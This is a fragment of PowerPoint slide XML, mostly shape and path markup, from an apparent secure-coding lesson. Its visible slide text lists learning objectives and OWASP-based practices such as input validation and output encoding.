              </a:pathLst>
            </a:custGeom>
            <a:ln w="1905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06237" y="5181853"/>
              <a:ext cx="168021" cy="16687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48200" y="5419344"/>
              <a:ext cx="288036" cy="288036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11482578" y="4153661"/>
              <a:ext cx="401320" cy="528955"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="401320" h="528954">
                  <a:moveTo>
                    <a:pt x="334010" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="528827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400812" y="528827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400812" y="66801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3340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11482578" y="4153661"/>
              <a:ext cx="401320" cy="528955"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="401320" h="528954">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="334010" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400812" y="66801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400812" y="528827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="528827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11548109" y="4271009"/>
              <a:ext cx="281940" cy="323215"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="281940" h="323214">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="281940" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="281940" h="323214">
                  <a:moveTo>
                    <a:pt x="0" y="80772"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="281940" y="80772"/>
                  </a:lnTo>
                </a:path>
                <a:path w="281940" h="323214">
                  <a:moveTo>
                    <a:pt x="0" y="242315"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="281940" y="242315"/>
                  </a:lnTo>
                </a:path>
                <a:path w="281940" h="323214">
                  <a:moveTo>
                    <a:pt x="0" y="161543"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="281940" y="161543"/>
                  </a:lnTo>
                </a:path>
                <a:path w="281940" h="323214">
                  <a:moveTo>
                    <a:pt x="0" y="323088"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="281940" y="323088"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575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41835" y="4480559"/>
              <a:ext cx="283464" cy="284988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11244326" y="6265062"/>
            <a:ext cx="990600" cy="782320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="14668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155"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="492125" algn="l"/>
                <a:tab pos="836294" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" u="heavy" baseline="-38194" sz="2400" spc="-765">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="5496D2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dirty="0" u="heavy" sz="1600" spc="-30" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="5496D2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600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="5496D2"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a: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600" spc="20" b="1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1060"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="492125" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" u="heavy" sz="1600" spc="-95">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="5496D2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dirty="0" u="heavy" sz="1600" spc="-95">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="5496D2"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr sz="1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48834" y="4258436"/>
            <a:ext cx="59594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14">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Illustrate</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-70">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-25">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Coding </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="25">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Practices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02278" y="784098"/>
            <a:ext cx="3538854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55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Learning</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114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45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Objectives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9692" y="1187196"/>
            <a:ext cx="4820411" cy="3657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3125723"/>
            <a:ext cx="457200" cy="4572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4062984"/>
            <a:ext cx="457200" cy="4572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5059679"/>
            <a:ext cx="457200" cy="4572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4755" y="6009132"/>
            <a:ext cx="457200" cy="4572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97763" y="2254757"/>
            <a:ext cx="6920865" cy="52260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1143000">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>By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en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thi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lesson,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you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w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ll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abl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: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3400">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" marR="1078865">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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Analyze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indicators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application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attacks</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="626110" marR="5080">
              <a:lnSpc>
                <a:spcPts val="7850"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="395"/>
              </a:spcBef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Outline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indicators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web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application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attacks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Il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secur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codin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prac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ices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00">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="622300">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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Implement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secure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script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environments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</a:pPr>
            <a:endParaRPr sz="3450">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="626110">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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Analyze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deployment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aut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mati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concepts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7016495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0503" y="306451"/>
            <a:ext cx="463486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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-6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25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-3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25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Techniques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93564" y="760476"/>
            <a:ext cx="6443472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37538" y="1882292"/>
            <a:ext cx="13383260" cy="13093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979670" marR="147955" indent="-4818380">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>OWASP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(Open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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Web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Application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Security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Project)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used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security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development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life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cycles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best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practice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guides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coding.</a:t>
            </a:r>
            <a:endParaRPr sz="2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Some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most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important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coding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practices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input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validation,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output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encoding,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normalization.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14322" y="4226814"/>
            <a:ext cx="6160135" cy="3787140"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6160134" h="3787140">
                <a:moveTo>
                  <a:pt x="0" y="631189"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1731" y="584081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6843" y="537913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15214" y="492807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26722" y="448887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41245" y="406273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58661" y="365088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78848" y="325453"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101683" y="287492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127046" y="251325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="154814" y="217075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="184864" y="184864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="217075" y="154814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="251325" y="127046"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287492" y="101683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325453" y="78848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365088" y="58661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="406273" y="41245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448887" y="26722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492807" y="15214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="537913" y="6843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="584081" y="1731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="631189" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5528818" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5575926" y="1731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5622094" y="6843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5667200" y="15214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5711120" y="26722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5753734" y="41245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5794919" y="58661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5834554" y="78848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5872515" y="101683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5908682" y="127046"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5942932" y="154814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5975143" y="184864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6005193" y="217075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6032961" y="251325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6058324" y="287492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6081159" y="325453"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6101346" y="365088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6118762" y="406273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6133285" y="448887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6144793" y="492807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6153164" y="537913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158276" y="584081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6160008" y="631189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6160008" y="3155950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158276" y="3203058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6153164" y="3249226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6144793" y="3294332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6133285" y="3338252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6118762" y="3380866"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6101346" y="3422051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6081159" y="3461686"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6058324" y="3499647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6032961" y="3535814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6005193" y="3570064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5975143" y="3602275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5942932" y="3632325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5908682" y="3660093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5872515" y="3685456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5834554" y="3708291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5794919" y="3728478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5753734" y="3745894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5711120" y="3760417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5667200" y="3771925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5622094" y="3780296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5575926" y="3785408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5528818" y="3787140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="631189" y="3787140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="584081" y="3785408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="537913" y="3780296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492807" y="3771925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448887" y="3760417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="406273" y="3745894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365088" y="3728478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325453" y="3708291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287492" y="3685456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="251325" y="3660093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="217075" y="3632325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="184864" y="3602275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="154814" y="3570064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127046" y="3535814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101683" y="3499647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78848" y="3461686"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58661" y="3422051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41245" y="3380866"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26722" y="3338252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15214" y="3294332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6843" y="3249226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1731" y="3203058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3155950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="631189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126995" y="4921148"/>
            <a:ext cx="5311140" cy="23196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670560" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000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Use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570">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>-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genera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d,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typed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,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 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entered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via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form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control</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="370"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000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pas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by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anothe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program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(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endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
            </a:pP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HTTP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heade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)</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="55880" indent="-343535">
              <a:lnSpc>
                <a:spcPts val="3010"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="90"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000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Docu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m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ent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st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al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type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er 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3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API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input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99588" y="3704844"/>
            <a:ext cx="4411980" cy="984885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4411980" h="984885">
                <a:moveTo>
                  <a:pt x="4247895" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="164084" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="820419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164084" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4247895" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4291535" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4330737" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4363942" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4389590" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4406122" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4411980" y="820419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4411980" y="164083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4406122" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4389590" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4363942" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4330737" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4291535" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4247895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974719" y="4001516"/>
            <a:ext cx="206057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Input</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="220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validation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257793" y="4226814"/>
            <a:ext cx="6162040" cy="3782695"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6162040" h="3782695">
                <a:moveTo>
                  <a:pt x="0" y="630427"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1728" y="583371"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6834" y="537254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15194" y="492200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26686" y="448330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41190" y="405766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58584" y="364630"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78744" y="325043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101551" y="287127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126881" y="251005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="154613" y="216797"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="184626" y="184626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216797" y="154613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="251005" y="126881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287127" y="101551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325043" y="78744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364630" y="58584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="405766" y="41190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448330" y="26686"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492200" y="15194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="537254" y="6834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="583371" y="1728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="630427" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5531104" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5578160" y="1728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5624277" y="6834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5669331" y="15194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5713201" y="26686"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5755765" y="41190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5796901" y="58584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5836488" y="78744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5874404" y="101551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5910526" y="126881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5944734" y="154613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5976905" y="184626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6006918" y="216797"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6034650" y="251005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6059980" y="287127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6082787" y="325043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6102947" y="364630"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6120341" y="405766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6134845" y="448330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6146337" y="492200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6154697" y="537254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6159803" y="583371"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6161532" y="630427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6161532" y="3152140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6159803" y="3199181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6154697" y="3245284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6146337" y="3290328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6134845" y="3334190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6120341" y="3376749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6102947" y="3417882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6082787" y="3457468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6059980" y="3495384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6034650" y="3531508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6006918" y="3565719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5976905" y="3597894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5944734" y="3627911"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5910526" y="3655648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5874404" y="3680984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5836488" y="3703796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5796901" y="3723963"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5755765" y="3741361"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5713201" y="3755870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5669331" y="3767367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5624277" y="3775730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5578160" y="3780838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5531104" y="3782568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="630427" y="3782568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="583371" y="3780838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="537254" y="3775730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492200" y="3767367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448330" y="3755870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="405766" y="3741361"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364630" y="3723963"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325043" y="3703796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287127" y="3680984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="251005" y="3655648"/>
                </a:lnTo>
                <a:lnTo>
